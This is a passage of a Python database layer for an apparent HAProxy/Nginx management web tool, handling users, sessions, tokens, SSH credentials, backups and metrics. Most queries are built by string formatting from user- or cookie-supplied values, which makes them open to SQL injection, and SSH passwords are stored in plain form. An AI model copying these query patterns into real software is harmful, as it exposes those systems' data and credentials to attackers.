sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_server(hostname, group, typeip, enable, master, id, cred, port, desc, haproxy, nginx): con, cur = get_cur() sql = """ update servers set hostname = '%s', groups = '%s', type_ip = '%s', enable = '%s', master = '%s', cred = '%s', port = '%s', `desc` = '%s', haproxy = '%s', nginx = '%s' where id = '%s'""" % (hostname, group, typeip, enable, master, cred, port, desc, haproxy, nginx, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_server_master(master, slave): con, cur = get_cur() sql = """ select id from servers where ip = '%s' """ % master try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): sql = """ update servers set master = '%s' where ip = '%s' """ % (id[0], slave) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def select_users(**kwargs): con, cur = get_cur() sql = """select * from user ORDER BY id""" if kwargs.get("user") is not None: sql = """select * from user where username='%s' """ % kwargs.get("user") if kwargs.get("id") is not None: sql = """select * from user where id='%s' """ % kwargs.get("id") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_groups(**kwargs): con, cur = get_cur() sql = """select * from groups ORDER BY id""" if kwargs.get("group") is not None: sql = """select * from groups where name='%s' """ % kwargs.get("group") if kwargs.get("id") is not None: sql = """select * from groups where id='%s' """ % kwargs.get("id") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_user_name_group(id): con, cur = get_cur() sql = """select name from groups where id='%s' """ % id try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for group in cur.fetchone(): return group cur.close() con.close() def select_server_by_name(name): con, cur = get_cur() sql = """select ip from servers where hostname='%s' """ % name try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for name in cur.fetchone(): return name cur.close() con.close() def select_servers(**kwargs): con, cur = get_cur() sql = """select * from servers where enable = '1' ORDER BY groups """ if kwargs.get("server") is not None: sql = """select * from servers where ip='%s' """ % kwargs.get("server") if kwargs.get("full") is not None: sql = """select * from servers ORDER BY hostname """ if kwargs.get("get_master_servers") is not None: sql = """select id,hostname from servers where master = 0 and type_ip = 0 and enable = 1 ORDER BY groups """ if kwargs.get("get_master_servers") is not None and kwargs.get('uuid') is not None: sql = """ select servers.id, servers.hostname from servers left join user as user on servers.groups = user.groups left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' and servers.master = 0 and servers.type_ip = 0 and servers.enable = 1 ORDER BY servers.groups """ % kwargs.get('uuid') if kwargs.get("id"): sql = """select * from servers where id='%s' """ % kwargs.get("id") if kwargs.get("hostname"): sql = """select * from servers where hostname='%s' """ % kwargs.get("hostname") if kwargs.get("id_hostname"): sql = """select * from servers where hostname='%s' or id = '%s' or ip = '%s'""" % (kwargs.get("id_hostname"), kwargs.get("id_hostname"), kwargs.get("id_hostname")) if kwargs.get("server") and kwargs.get("keep_alive"): sql = """select active from servers where ip='%s' """ % kwargs.get("server") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def write_user_uuid(login, user_uuid): con, cur = get_cur() session_ttl = get_setting('session_ttl') session_ttl = int(session_ttl) sql = """ select id from user where username = '%s' """ % login try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): if mysql_enable == '1': sql = """ insert into uuid (user_id, uuid, exp) values('%s', '%s', now()+ INTERVAL '%s' day) """ % (id[0], user_uuid, session_ttl) else: sql = """ insert into uuid (user_id, uuid, exp) values('%s', '%s', datetime('now', '+%s days')) """ % (id[0], user_uuid, session_ttl) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def write_user_token(login, user_token): con, cur = get_cur() token_ttl = get_setting('token_ttl') sql = """ select id from user where username = '%s' """ % login try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) for id in cur.fetchall(): if mysql_enable == '1': sql = """ insert into token (user_id, token, exp) values('%s', '%s', now()+ INTERVAL %s day) """ % (id[0], user_token, token_ttl) else: sql = """ insert into token (user_id, token, exp) values('%s', '%s', datetime('now', '+%s days')) """ % (id[0], user_token, token_ttl) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def get_token(uuid): con, cur = get_cur() sql = """ select token.token from token left join uuid as uuid on uuid.user_id = token.user_id where uuid.uuid = '%s' """ % uuid try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for token in cur.fetchall(): return token[0] cur.close() con.close() def delete_uuid(uuid): con, cur = get_cur() sql = """ delete from uuid where uuid = '%s' """ % uuid try: cur.execute(sql) con.commit() except sqltool.Error as e: pass cur.close() con.close() def delete_old_uuid(): con, cur = get_cur() if mysql_enable == '1': sql = """ delete from uuid where exp < now() or exp is NULL """ sql1 = """ delete from token where exp < now() or exp is NULL """ else: sql = """ delete from uuid where exp < datetime('now') or exp is NULL""" sql1 = """ delete from token where exp < datetime('now') or exp is NULL""" try: cur.execute(sql) cur.execute(sql1) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_last_act_user(uuid): con, cur = get_cur() session_ttl = get_setting('session_ttl') if mysql_enable == '1': sql = """ update uuid set exp = now()+ INTERVAL %s day where uuid = '%s' """ % (session_ttl, uuid) else: sql = """ update uuid set exp = datetime('now', '+%s days') where uuid = '%s' """ % (session_ttl, uuid) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def get_user_name_by_uuid(uuid): con, cur = get_cur() sql = """ select user.username from user left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' """ % uuid try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for user_id in cur.fetchall(): return user_id[0] cur.close() con.close() def get_user_role_by_uuid(uuid): con, cur = get_cur() try: cur.execute("select role.id from user left join uuid as uuid on user.id = uuid.user_id left join role on role.name = user.role where uuid.uuid = ?", (uuid,)) except sqltool.Error as e: funct.out_error(e) else: for user_id in cur.fetchall(): return user_id[0] cur.close() con.close() def get_role_id_by_name(name): con, cur = get_cur() sql = """ select id from role where name = '%s' """ % name try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for user_id in cur.fetchall(): return user_id[0] cur.close() con.close() def get_user_group_by_uuid(uuid): con, cur = get_cur() sql = """ select user.groups from user left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' """ % uuid try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for user_id in cur.fetchall(): return user_id[0] cur.close() con.close() def get_user_telegram_by_uuid(uuid): con, cur = get_cur() sql = """ select telegram.* from telegram left join user as user on telegram.groups = user.groups left join uuid as uuid on user.id = uuid.user_id where uuid.uuid = '%s' """ % uuid try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def get_telegram_by_ip(ip): con, cur = get_cur() sql = """ select telegram.* from telegram left join servers as serv on serv.groups = telegram.groups where serv.ip = '%s' """ % ip try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def get_dick_permit(**kwargs): import http.cookies import os cookie = http.cookies.SimpleCookie(os.environ.get("HTTP_COOKIE")) user_id = cookie.get('uuid') disable = '' haproxy = '' nginx = '' keepalived = '' ip = '' con, cur = get_cur() if kwargs.get('username'): sql = """ select * from user where username = '%s' """ % kwargs.get('username') else: sql = """ select * from user where username = '%s' """ % get_user_name_by_uuid(user_id.value) if kwargs.get('virt'): type_ip = "" else: type_ip = "and type_ip = 0" if kwargs.get('disable') == 0: disable = 'or enable = 0' if kwargs.get('ip'): ip = "and ip = '%s'" % kwargs.get('ip') if kwargs.get('haproxy'): haproxy = "and haproxy = 1" if kwargs.get('nginx'): nginx = "and nginx = 1" if kwargs.get('keepalived'): nginx = "and keepalived = 1" try: cur.execute(sql) except sqltool.Error as e: print("An error occurred:", e) else: for group in cur: if group[5] == '1': sql = """ select * from servers where enable = 1 %s %s %s """ % (disable, type_ip, nginx) else: sql = """ select * from servers where groups like '%{group}%' and (enable = 1 {disable}) {type_ip} {ip} {haproxy} {nginx} {keepalived} """.format(group=group[5], disable=disable, type_ip=type_ip, ip=ip, haproxy=haproxy, nginx=nginx, keepalived=keepalived) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def is_master(ip, **kwargs): con, cur = get_cur() sql = """ select slave.ip, slave.hostname from servers as master left join servers as slave on master.id = slave.master where master.ip = '%s' """ % ip if kwargs.get('master_slave'): sql = """ select master.hostname, master.ip, slave.hostname, slave.ip from servers as master left join servers as slave on master.id = slave.master where slave.master > 0 """ try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_ssh(**kwargs): con, cur = get_cur() sql = """select * from cred """ if kwargs.get("name") is not None: sql = """select * from cred where name = '%s' """ % kwargs.get("name") if kwargs.get("id") is not None: sql = """select * from cred where id = '%s' """ % kwargs.get("id") if kwargs.get("serv") is not None: sql = """select serv.cred, cred.* from servers as serv left join cred on cred.id = serv.cred where serv.ip = '%s' """ % kwargs.get("serv") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def insert_new_ssh(name, enable, group, username, password): con, cur = get_cur() sql = """insert into cred(name, enable, groups, username, password) values ('%s', '%s', '%s', '%s', '%s') """ % (name, enable, group, username, password) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def delete_ssh(id): con, cur = get_cur() sql = """ delete from cred where id = %s """ % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def update_ssh(id, name, enable, group, username, password): con, cur = get_cur() sql = """ update cred set name = '%s', enable = '%s', groups = %s, username = '%s', password = '%s' where id = '%s' """ % (name, enable, group, username, password, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def insert_backup_job(server, rserver, rpath, type, time, cred, description): con, cur = get_cur() sql = """insert into backups(server, rhost, rpath, type, time, cred, description) values ('%s', '%s', '%s', '%s', '%s', '%s', '%s') """ % (server, rserver, rpath, type, time, cred, description) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def select_backups(**kwargs): con, cur = get_cur() sql = """select * from backups ORDER BY id""" if kwargs.get("server") is not None and kwargs.get("rserver") is not None: sql = """select * from backups where server='%s' and rhost = '%s' """ % (kwargs.get("server"), kwargs.get("rserver")) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def update_backup(server, rserver, rpath, type, time, cred, description, id): con, cur = get_cur() sql = """update backups set server = '%s', rhost = '%s', rpath = '%s', type = '%s', time = '%s', cred = '%s', description = '%s' where id = '%s' """ % (server, rserver, rpath, type, time, cred, description, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def delete_backups(id): con, cur = get_cur() sql = """ delete from backups where id = %s """ % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def check_exists_backup(server): con, cur = get_cur() sql = """ select id from backups where server = '%s' """ % server try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for s in cur.fetchall(): if s[0] is not None: return True else: return False cur.close() con.close() def insert_new_telegram(token, chanel, group): con, cur = get_cur() sql = """insert into telegram(`token`, `chanel_name`, `groups`) values ('%s', '%s', '%s') """ % (token, chanel, group) try: cur.execute(sql) con.commit() except sqltool.Error as e: print('<span class="alert alert-danger" id="error">An error occurred: ' + e.args[0] + ' <a title="Close" id="errorMess"><b>X</b></a></span>') con.rollback() else: return True cur.close() con.close() def delete_telegram(id): con, cur = get_cur() sql = """ delete from telegram where id = %s """ % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def select_telegram(**kwargs): con, cur = get_cur() sql = """select * from telegram """ if kwargs.get('group'): sql = """select * from telegram where groups = '%s' """ % kwargs.get('group') if kwargs.get('token'): sql = """select * from telegram where token = '%s' """ % kwargs.get('token') if kwargs.get('id'): sql = """select * from telegram where id = '%s' """ % kwargs.get('id') try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def insert_new_telegram(token, chanel, group): con, cur = get_cur() sql = """insert into telegram(`token`, `chanel_name`, `groups`) values ('%s', '%s', '%s') """ % (token, chanel, group) try: cur.execute(sql) con.commit() except sqltool.Error as e: print('<span class="alert alert-danger" id="error">An error occurred: ' + e.args[0] + ' <a title="Close" id="errorMess"><b>X</b></a></span>') con.rollback() else: return True cur.close() con.close() def update_telegram(token, chanel, group, id): con, cur = get_cur() sql = """ update telegram set `token` = '%s', `chanel_name` = '%s', `groups` = '%s' where id = '%s' """ % (token, chanel, group, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def insert_new_option(option, group): con, cur = get_cur() sql = """insert into options(`options`, `groups`) values ('%s', '%s') """ % (option, group) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def select_options(**kwargs): con, cur = get_cur() sql = """select * from options """ if kwargs.get('option'): sql = """select * from options where options = '%s' """ % kwargs.get('option') if kwargs.get('group'): sql = """select options from options where groups = '{}' and options like '{}%' """.format(kwargs.get('group'), kwargs.get('term')) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def update_options(option, id): con, cur = get_cur() sql = """ update options set options = '%s' where id = '%s' """ % (option, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def delete_option(id): con, cur = get_cur() sql = """ delete from options where id = %s """ % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def insert_new_savedserver(server, description, group): con, cur = get_cur() sql = """insert into saved_servers(`server`, `description`, `groups`) values ('%s', '%s', '%s') """ % (server, description, group) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def select_saved_servers(**kwargs): con, cur = get_cur() sql = """select * from saved_servers """ if kwargs.get('server'): sql = """select * from saved_servers where server = '%s' """ % kwargs.get('server') if kwargs.get('group'): sql = """select server,description from saved_servers where groups = '{}' and server like '{}%' """.format(kwargs.get('group'), kwargs.get('term')) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def update_savedserver(server, description, id): con, cur = get_cur() sql = """ update saved_servers set server = '%s', description = '%s' where id = '%s' """ % (server, description, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def delete_savedserver(id): con, cur = get_cur() sql = """ delete from saved_servers where id = %s """ % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def insert_mentrics(serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate): con, cur = get_cur() if mysql_enable == '1': sql = """ insert into metrics (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate, date) values('%s', '%s', '%s', '%s', '%s', now()) """ % (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate) else: sql = """ insert into metrics (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate, date) values('%s', '%s', '%s', '%s', '%s', datetime('now', 'localtime')) """ % (serv, curr_con, cur_ssl_con, sess_rate, max_sess_rate) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def select_waf_metrics_enable(id): con, cur = get_cur() sql = """ select waf.metrics from waf left join servers as serv on waf.server_id = serv.id where server_id = '%s' """ % id try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_waf_metrics_enable_server(ip): con, cur = get_cur() sql = """ select waf.metrics from waf left join servers as serv on waf.server_id = serv.id where ip = '%s' """ % ip try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for enable in cur.fetchall(): return enable[0] cur.close() con.close() def select_waf_servers(serv): con, cur = get_cur() sql = """ select serv.ip from waf left join servers as serv on waf.server_id = serv.id where serv.ip = '%s' """ % serv try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_all_waf_servers(): con, cur = get_cur() sql = """ select serv.ip from waf left join servers as serv on waf.server_id = serv.id """ try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_waf_servers_metrics(uuid, **kwargs): con, cur = get_cur() sql = """ select * from user where username = '%s' """ % get_user_name_by_uuid(uuid) try: cur.execute(sql) except sqltool.Error as e: print("An error occurred:", e) else: for group in cur: if group[5] == '1': sql = """ select servers.ip from servers left join waf as waf on waf.server_id = servers.id where servers.enable = 1 and waf.metrics = '1' """ else: sql = """ select servers.ip from servers left join waf as waf on waf.server_id = servers.id where servers.enable = 1 and waf.metrics = '1' and servers.groups like '%{group}%' """.format(group=group[5]) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_waf_metrics(serv, **kwargs): con, cur = get_cur() sql = """ select * from (select * from waf_metrics where serv = '%s' order by `date` desc limit 60) order by `date`""" % serv try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def insert_waf_metrics_enable(serv, enable): con, cur = get_cur() sql = """ insert into waf (server_id, metrics) values((select id from servers where ip = '%s'), '%s') """ % (serv, enable) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def delete_waf_server(id): con, cur = get_cur() sql = """ delete from waf where server_id = '%s' """ % id try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def insert_waf_mentrics(serv, conn): con, cur = get_cur() if mysql_enable == '1': sql = """ insert into waf_metrics (serv, conn, date) values('%s', '%s', now()) """ % (serv, conn) else: sql = """ insert into waf_metrics (serv, conn, date) values('%s', '%s', datetime('now', 'localtime')) """ % (serv, conn) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def delete_waf_mentrics(): con, cur = get_cur() if mysql_enable == '1': sql = """ delete from metrics where date < now() - INTERVAL 3 day """ else: sql = """ delete from metrics where date < datetime('now', '-3 days') """ try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def update_waf_metrics_enable(name, enable): con, cur = get_cur() sql = """ update waf set metrics = %s where server_id = (select id from servers where hostname = '%s') """ % (enable, name) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def delete_mentrics(): con, cur = get_cur() if mysql_enable == '1': sql = """ delete from metrics where date < now() - INTERVAL 3 day """ else: sql = """ delete from metrics where date < datetime('now', '-3 days') """ try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() cur.close() con.close() def select_metrics(serv, **kwargs): con, cur = get_cur() sql = """ select * from (select * from metrics where serv = '%s' order by `date` desc limit 60) order by `date` """ % serv try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_servers_metrics_for_master(): con, cur = get_cur() sql = """select ip from servers where metrics = 1 """ try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_servers_metrics(uuid, **kwargs): con, cur = get_cur() sql = """ select * from user where username = '%s' """ % get_user_name_by_uuid(uuid) try: cur.execute(sql) except sqltool.Error as e: print("An error occurred:", e) else: for group in cur: if group[5] == '1': sql = """ select ip from servers where enable = 1 and metrics = '1' """ else: sql = """ select ip from servers where groups like '%{group}%' and metrics = '1'""".format(group=group[5]) try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_table_metrics(uuid): con, cur = get_cur() groups = "" sql = """ select * from user where username = '%s' """ % get_user_name_by_uuid(uuid) try: cur.execute(sql) except sqltool.Error as e: print("An error occurred:", e) else: for group in cur: if group[5] == '1': groups = "" else: groups = "and servers.groups like '%{group}%' ".format(group=group[5]) if mysql_enable == '1': sql = """ select ip.ip, hostname, avg_sess_1h, avg_sess_24h, avg_sess_3d, max_sess_1h, max_sess_24h, max_sess_3d, avg_cur_1h, avg_cur_24h, avg_cur_3d, max_con_1h, max_con_24h, max_con_3d from (select servers.ip from servers where metrics = 1 ) as ip, (select servers.ip, servers.hostname as hostname from servers left join metrics as metr on servers.ip = metr.serv where servers.metrics = 1 %s) as hostname, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(), INTERVAL -1 HOUR) group by servers.ip) as avg_sess_1h, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as avg_sess_24h, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(), INTERVAL -3 DAY) group by servers.ip ) as avg_sess_3d, (select servers.ip,max(metr.sess_rate) as max_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as max_sess_1h, (select servers.ip,max(metr.sess_rate) as max_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as max_sess_24h, (select servers.ip,max(metr.sess_rate) as max_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as max_sess_3d, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as avg_cur_1h, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as avg_cur_24h, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as avg_cur_3d, (select servers.ip,max(metr.curr_con) as max_con_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as max_con_1h, (select servers.ip,max(metr.curr_con) as max_con_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as max_con_24h, (select servers.ip,max(metr.curr_con) as max_con_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as max_con_3d where ip.ip=hostname.ip and ip.ip=avg_sess_1h.ip and ip.ip=avg_sess_24h.ip and ip.ip=avg_sess_3d.ip and ip.ip=max_sess_1h.ip and ip.ip=max_sess_24h.ip and ip.ip=max_sess_3d.ip and ip.ip=avg_cur_1h.ip and ip.ip=avg_cur_24h.ip and ip.ip=avg_cur_3d.ip and ip.ip=max_con_1h.ip and ip.ip=max_con_24h.ip and ip.ip=max_con_3d.ip group by hostname.ip """ % groups else: sql = """ select ip.ip, hostname, avg_sess_1h, avg_sess_24h, avg_sess_3d, max_sess_1h, max_sess_24h, max_sess_3d, avg_cur_1h, avg_cur_24h, avg_cur_3d, max_con_1h, max_con_24h, max_con_3d from (select servers.ip from servers where metrics = 1 ) as ip, (select servers.ip, servers.hostname as hostname from servers left join metrics as metr on servers.ip = metr.serv where servers.metrics = 1 %s) as hostname, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as avg_sess_1h, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as avg_sess_24h, (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as avg_sess_3d, (select servers.ip,max(metr.sess_rate) as max_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as max_sess_1h, (select servers.ip,max(metr.sess_rate) as max_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as max_sess_24h, (select servers.ip,max(metr.sess_rate) as max_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as max_sess_3d, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as avg_cur_1h, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as avg_cur_24h, (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as avg_cur_3d, (select servers.ip,max(metr.curr_con) as max_con_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as max_con_1h, (select servers.ip,max(metr.curr_con) as max_con_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as max_con_24h, (select servers.ip,max(metr.curr_con) as max_con_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as max_con_3d where ip.ip=hostname.ip and ip.ip=avg_sess_1h.ip and ip.ip=avg_sess_24h.ip and ip.ip=avg_sess_3d.ip and ip.ip=max_sess_1h.ip and ip.ip=max_sess_24h.ip and ip.ip=max_sess_3d.ip and ip.ip=avg_cur_1h.ip and ip.ip=avg_cur_24h.ip and ip.ip=avg_cur_3d.ip and ip.ip=max_con_1h.ip and ip.ip=max_con_24h.ip and ip.ip=max_con_3d.ip group by hostname.ip """ % groups try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def get_setting(param, **kwargs): con, cur = get_cur() sql = """select value from `settings` where param='%s' """ % param if kwargs.get('all'): sql = """select * from `settings` order by section desc""" try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: if kwargs.get('all'): return cur.fetchall() else: for value in cur.fetchone(): return value cur.close() con.close() def update_setting(param, val): con, cur = get_cur() sql = """update `settings` set `value` = '%s' where param = '%s' """ % (val, param) try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def get_ver(): con, cur = get_cur() sql = """ select * from version; """ try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for ver in cur.fetchall(): return ver[0] cur.close() con.close() def select_roles(**kwargs): con, cur = get_cur() sql = """select * from role ORDER BY id""" if kwargs.get("roles") is not None: sql = """select * from role where name='%s' """ % kwargs.get("roles") try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_alert(**kwargs): con, cur = get_cur() sql = """select ip from servers where alert = 1 """ try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_keep_alive(**kwargs): con, cur = get_cur() sql = """select ip from servers where active = 1 """ try: 